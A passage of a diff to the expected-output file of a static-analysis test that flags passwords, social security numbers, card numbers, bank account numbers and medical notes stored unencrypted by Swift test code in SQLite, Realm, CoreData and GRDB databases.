testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | -| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:210:85:210:85 | password | password | -| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | -| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | -| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | -| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | -| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | -| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | -| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. 
| testRealm2.swift:33:11:33:11 | CCN | CCN | -| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | -| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | -| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | -| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | -| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | -| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | edges | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | provenance | | | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | provenance | | 
@@ -762,3 +622,143 @@ subpaths | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:59:2:59:3 | [post] ...! | | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:66:2:66:2 | [post] g | | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:34:6:34:6 | value | testRealm.swift:34:6:34:6 | self [Return] [password] | testRealm.swift:73:2:73:2 | [post] h | +#select +| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:171:31:171:69 | [...] 
| SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. 
| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | +| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:50:2:50:10 | ...? 
| testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | +| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:88:2:88:10 | ...? 
| testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. 
It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | +| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | +| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | +| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | +| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | +| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. 
It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | +| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | +| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | +| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | +| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | +| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | +| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | +| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | +| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | +| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | +| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | +| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | +| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | +| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | +| testGRDB.swift:95:36:95:45 | [...] 
| testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | +| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | +| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | +| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | +| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | +| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | +| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | +| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] 
